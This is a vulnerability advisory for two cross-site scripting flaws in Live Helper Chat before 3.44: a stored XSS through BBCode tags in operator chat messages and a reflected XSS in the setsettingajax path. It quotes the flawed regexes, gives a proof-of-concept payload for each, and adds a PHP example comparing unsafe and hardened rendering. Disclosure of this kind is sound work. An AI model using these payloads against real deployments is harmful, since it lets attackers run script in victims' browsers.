CVE-2020-26134
description
Live Helper Chat before 3.44v allows stored XSS in chat messages with an operator via BBCode.
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] LiveHelperChat
[Affected Product Code Base] https://github.com/LiveHelperChat/livehelperchat - versions < 3.44
[Affected Component] Stored XSS in chat messages with operator
vulnerability
Live Helper Chat allows BBCode in chat messages, but when a BBCode tag is combined with a URL the parser fails to sanitize the message (the URL parser fails), so the markup is not inserted into the web page correctly. Several BBCode patterns can be abused:
'/\[list\=(.*?)\](.*?)\[\/list\]/ms',
'/\[fs(.*?)\](.*?)\[\/fs(.*?)\]/ms',
'/\[color\=(.*?)\](.*?)\[\/color\]/ms'
example payload
[list="><img src="http://onmouseover=alert(document.domain)//"><ol f="][/list]
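The patterns above capture the tag attribute with an unconstrained (.*?). The following is an added example, not Live Helper Chat's own code, showing why that capture must be allow-listed before it reaches an HTML attribute. The function names, the <ol type="..."> template and the sample inputs are assumptions made for illustration, and the example covers only the attribute handling, not the URL-parser interaction described above.

```php
<?php
// Added example: hypothetical renderers, not Live Helper Chat's own code.
// The pattern is the [list=...] regex quoted above; the HTML template is assumed.
const LIST_PATTERN = '/\[list\=(.*?)\](.*?)\[\/list\]/ms';

// Unsafe shape: the free-form capture is copied into an attribute unescaped.
function render_list_unsafe(string $msg): string
{
    return preg_replace(LIST_PATTERN, '<ol type="$1">$2</ol>', $msg) ?? $msg;
}

// Hardened shape: escape the whole message first, then allow-list the
// attribute value instead of trusting whatever (.*?) captured.
function render_list_safe(string $msg): string
{
    $escaped = htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $out = preg_replace_callback(
        LIST_PATTERN,
        function (array $m): string {
            // Only the values HTML defines for <ol type>; anything else
            // leaves the tag as inert, already-escaped text.
            if (!in_array($m[1], ['1', 'a', 'A', 'i', 'I'], true)) {
                return $m[0];
            }
            return '<ol type="' . $m[1] . '">' . $m[2] . '</ol>';
        },
        $escaped
    );
    return $out ?? $escaped;
}

// Constructed sample inputs (benign: the second only adds a data- attribute).
$samples = [
    '[list=1]first item[/list]',
    '[list=1" data-injected="yes]first item[/list]',
];

foreach ($samples as $s) {
    echo "input : $s\n";
    echo "unsafe: " . render_list_unsafe($s) . "\n";
    echo "safe  : " . render_list_safe($s) . "\n\n";
}
```

With the second input, the unsafe renderer emits an extra attribute on the <ol> element, while the hardened renderer leaves the whole tag as escaped text.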
CVE-2020-26135
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] LiveHelperChat
[Affected Product Code Base] https://github.com/LiveHelperChat/livehelperchat - versions < 3.44
[Affected Component] Reflected XSS in setsettingajax
example payload
http://HOST/LCH_PATH/index.php/user/setsettingajax/%3Csvg%20onload=alert(1)%3E